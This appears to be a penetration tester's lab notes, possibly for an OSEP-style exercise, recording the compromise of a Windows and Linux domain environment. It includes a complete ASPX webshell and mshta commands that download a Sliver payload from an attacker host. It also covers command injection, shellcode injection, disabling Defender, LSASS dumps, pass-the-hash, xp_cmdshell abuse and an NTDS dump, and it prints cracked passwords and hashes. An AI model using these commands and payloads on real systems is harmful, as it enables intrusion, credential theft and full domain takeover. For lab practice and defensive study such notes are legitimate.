Detailed Findings and Recommendations
The scope of this penetration test is to identify, exploit and report the results of of penetration test performed on following set of IP addresses.
| IPs | Machine name | domain | |
|---|---|---|---|
| 172.16.225.180 | Dc01 | compromised | final.com |
| 192.168.225.181 | web05 | compromised | final.com |
| 172.16.225.183 | Jump03 | compromised | final.com |
| 172.16.225.184 | Ansible06 | compromised | final.com |
| 172.16.225.197 | Appserver05 | compromised | dev.final.com |
| 172.16.225.194 | WEB06 | compromised | dev.final.com |
| 172.16.225.192 | DC02 | compromised | dev.final.com |
| 172.16.225.188 | SQL11 | compromised | final.com |
| 172.16.225.187 | SQL03 | compromised | final.com |
192.168.225.189
Recon
Nmap scan
sudo nmap -sC -sV -oA firewall02 -vv 192.168.225.189 -Pn
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: FIREWALL02
| NetBIOS_Domain_Name: FIREWALL02
| NetBIOS_Computer_Name: FIREWALL02
| DNS_Domain_Name: firewall02
| DNS_Computer_Name: firewall02
| Product_Version: 10.0.17763
|_ System_Time: 2024-04-25T21:16:25+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
feroxbuster
feroxbuster -k -u http://192.168.225.189 --force-recursion -C 404,405 -m GET,POST -e -x html,js,php
192.168.225.181 (WEB05)
Recon
Payload Development
Aspx shell
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string test(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(test(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>Initial access
C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta
Privilege Escalation
- Use the file generated from sliverphollow from above sph.exe
- copy ‘/opt/Tools/privesc-windows/PrintSpoofer64.exe’
cp /opt/Tools/privesc-windows/PrintSpoofer64.exe .
upload sph.exe
./donut -i /home/jay/osep/challenge6/resources_development/PrintSpoofer64.exe -a 2 -b 2 -o /tmp/payload.bin -p '-c c:\windows\temp\sph.exe'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
Post Exploitation
Disabling AV
execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
sliver (CALM_CULVERT) > hashdump
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:9689cee5c72d2ef437de593af89bb4ff:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:0830e44897e2d5a6e779aba9dc2b6c56:::::
Nanodump
nanodump 572 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test
adminWebSvc
b0df1cb0819ca0b7d476d4c868175b94
- ligolo setup
evilwinrm
evil-winrm -i 172.16.225.181 -u adminWebSvc -H b0df1cb0819ca0b7d476d4c868175b94
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
execute -o cmd /c "reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f"
xfreerdp /u:adminWebSvc /pth:b0df1cb0819ca0b7d476d4c868175b94 /v:192.168.225.181
ForceChangePassword
pth-net rpc password "Nina" "newP@ssword2022" -U final.com/adminwebsvc%b0df1cb0819ca0b7d476d4c868175b94:b0df1cb0819ca0b7d476d4c868175b94 -S 172.16.225.181
172.16.225.183 (Jump03)
xfreerdp /u:nina /p:newP@ssword2022 /v:172.16.225.183
sharpup audit
sc.exe config snmptrap start= auto
sc config "SNMPTRAP" obj= "NT AUTHORITY\SYSTEM" password= ""
sc config "SNMPTRAP" binPath= "net localgroup Administrators final\nina /add"
sc stop "SNMPTRAP"
net localgroup Administrators
sc start "SNMPTRAP"
net localgroup Administrators
- Start powershell as admin user
- execute the payload sph.exe
nanodump 580 test1 1 PMDM
download test1
python3 -m pypykatz lsa minidump test1
Username: Administrator
Domain: JUMP03
LM: NA
NT: 935a2a886200d2bf5040b1344b2d33d7
SHA1: 6a1c961b199adf48ce253a680c3f59c69ab58542
Username: tommy
Domain: FINAL
LM: NA
NT: 5ad27ee8000951e0669fab25f73f9d8a
SHA1: 83f547f292288b86f9d17d27097f6c30257a8493
DPAPI: f08238f6307b02108f31c3bca65bc27a
== Kerberos ==
Username: tommy
Domain: FINAL.COM
Password: 89dsfsji43A
password (hex)3800390064007300660073006a0069003400330041000000
cme rdp ips.txt -u tommy -H 5ad27ee8000951e0669fab25f73f9d8a -d final.com 2>/dev/null
172.16.225.184 Ansible06
ssh final.com\\tommy@172.16.225.184
sudo -l
sudo lua -e 'os.execute("/bin/bash")'
In ansiblesvc
cat y.pub > .ssh/authorized_keys
chmod 600 ansible
ssh -i ansible ansiblesvc@172.16.225.184
/etc/ansible$ cat hosts
172.16.225.197 (Appserver05) from ansible06
ssh appserver05.dev.final.com
sudo su
root@appserver05:~# cat proof.txt
c8a5fbdf5ccaedb65a6f325562389611
172.16.225.194 (WEB06)
pivot from appserver05
- command injection on port 8081
GET /?ipaddr=17.0.0.1|powershell+mshta.exe+http://192.168.45.248/sliver64.hta HTTP/1.1
Host: 172.16.225.194:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://172.16.225.194:8081/?ipaddr=127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Privilege escalations as above
- check web05
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAA4ADoAOAAwAC8AYQBtAHMAaQA2ADQALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA
Username: apacheSvc
Domain: DEV
LM: NA
NT: a6a5f008019060ab8079feca697f9f73
SHA1: e957ac189a18afeaa3719d633bb817c14d132336
DPAPI: 9ac5d1d435e5c7fd520505b52faa487b
== MSV ==
Username: sqlsvc01
Domain: DEV
LM: NA
NT: 077a55c458dc4002dfdc5321a7659526
SHA1: 8094dd9dcd751be1081dded062d5e0153daf8836
DPAPI: b713b3e0fc6eb8e37cadd2d5eda8daea
Username: setup
Domain: WEB06
LM: NA
NT: 42efdb0f0c884f32d51c2d785ea2d174
SHA1: f76679836170e221fe696e1deec2b5aa83e18d38
DPAPI: NA
xfreerdp /u:Administrator /pth:f99529e42ee77dc4704c568ba9320a34 /v:172.16.225.194
socks5 start
172.16.225.187
proxychains mssqlclient.py Administrator@172.16.225.194 -hashes f99529e42ee77dc4704c568ba9320a34:f99529e42ee77dc4704c568ba9320a34 -windows-auth
exec_as_login sa
select * from openquery("SQL03", 'SELECT is_srvrolemember(''sysadmin'')')
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
EXEC master.dbo.sp_serveroption @server = N'SQL03', @optname = N'rpc out', @optvalue = N'true';
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL03];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL03];
EXEC('EXEC xp_cmdshell ''whoami'';') AT [SQL03];
EXEC('EXEC xp_cmdshell ''C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta'';') AT [SQL03];
- Reverse for security
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL03];
Privilege Escalation
upload sph.exe
execute notepad.exe
ps -e notepad.exe
execute-shellcode -p 1364 /tmp/payload.bin
Post Exploitation
sqlrecon -- /enum:sqlspns
- identify lsass.exe
ps
nanodump 576 test4 1 PMDM
download test4
python3 -m pypykatz lsa minidump test4
Username: sqlsvc03
Domain: FINAL
LM: NA
NT: 77f944ff6e0c0ed0c83dcef57bdf9298
SHA1: 747df671015d1ec1c50ffc38f4ecc97b7ead8c32
DPAPI: 17aa3dc68e3e67783ace602437ee352c
mssqlclient.py sqlsvc03@172.16.225.187 -hashes 77f944ff6e0c0ed0c83dcef57bdf9298:77f944ff6e0c0ed0c83dcef57bdf9298 -windows-auth
hashdump
172.16.225.188
mssqlclient.py sqlsvc03@172.16.225.188 -hashes 77f944ff6e0c0ed0c83dcef57bdf9298:77f944ff6e0c0ed0c83dcef57bdf9298 -windows-auth
password resue from sql03 admin account
cme smb 172.16.225.188 -u 'Administrator' -H 8388d07604009d14cbb78f7d37b9e887 --local-auth
cme smb 172.16.225.188 -u 'Administrator' -H 8388d07604009d14cbb78f7d37b9e887 --local-auth -x "C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta" --exec-method smbexec
execute notepad.exe
ps -e notepad.exe
nanodump 580 test5 1 PMDM
download test5
python3 -m pypykatz lsa minidump test5
Username: tina
Domain: FINAL
LM: NA
NT: 1d4c153225b424290188504b9e0541eb
SHA1: 6ea7a37a1b5b943266cde1176d497e0044d69512
DPAPI: ea0e1bc1ff1c38a63033aa9e134b4fe4
Username: tina
Domain: FINAL.COM
Password: df54ikosdfGFkoal
172.16.225.180
cme smb 172.16.225.180 -u 'tina' -H 1d4c153225b424290188504b9e0541eb -x "C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta" --exec-method smbexec
cme smb 172.16.225.180 -u 'tina' -H 1d4c153225b424290188504b9e0541eb -M ntdsutil
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0474d3f0a74d30f13f1fec243e8ac3cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c0fc44703804b02590fe92237adca0de:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:405854caaf49b41e0e585369a001f114:::
DEV$:1103:aad3b435b51404eeaad3b435b51404ee:3539d6b0f82488e8088702b6c569f4e8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FINAL$:1103:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
final.com\tina:1109:aad3b435b51404eeaad3b435b51404ee:1d4c153225b424290188504b9e0541eb:::
final.com\nina:1110:aad3b435b51404eeaad3b435b51404ee:25af00893895d3d871e625c5d4261539:::
final.com\tommy:1112:aad3b435b51404eeaad3b435b51404ee:5ad27ee8000951e0669fab25f73f9d8a:::
final.com\sqlsvc03:1113:aad3b435b51404eeaad3b435b51404ee:77f944ff6e0c0ed0c83dcef57bdf9298:::
final.com\sqlsvc11:1114:aad3b435b51404eeaad3b435b51404ee:c0f6442ea39956aebf28219639ba9953:::
final.com\adminWebSvc:1115:aad3b435b51404eeaad3b435b51404ee:b0df1cb0819ca0b7d476d4c868175b94:::
dev.final.com\diana:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dev.final.com\sqlsvc01:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dev.final.com\apacheSvc:1109:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SQL03$:1116:aad3b435b51404eeaad3b435b51404ee:f4d6ce33fa1e2fcd01e0545a9ae47fee:::
SQL11$:1117:aad3b435b51404eeaad3b435b51404ee:7092f556ae1a347ae0ed38ffd25997d6:::
WEB06$:1110:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WEB05$:1118:aad3b435b51404eeaad3b435b51404ee:243e259c4f96e630b80551697fef50f8:::
JUMP03$:1119:aad3b435b51404eeaad3b435b51404ee:3478cc08e4780d8f65dbf210fa5f78af:::
ANSIBLE06$:1120:aad3b435b51404eeaad3b435b51404ee:125b6af695a522e547859b474a2ebecd:::
Domain Admins Owns Enterprise Admins
sharpview Add-DomainObjectAcl -TargetIdentity \"Enterprise Admins\" -Rights WriteMembers -PrincipalIdentity tina
sharpview Add-DomainGroupMember -Identity \"Enterprise Admins\" -Members tina
sharpview Get-DomainGroupMember -Identity \"Enterprise Admins\"
172.16.225.192
cme smb 172.16.225.192 -u 'tina' -H 1d4c153225b424290188504b9e0541eb -d final.com -x "C:\Windows\System32\mshta.exe http://192.168.45.248/sliver64.hta"
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential’s files
| Found in | File | Type |
|---|---|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |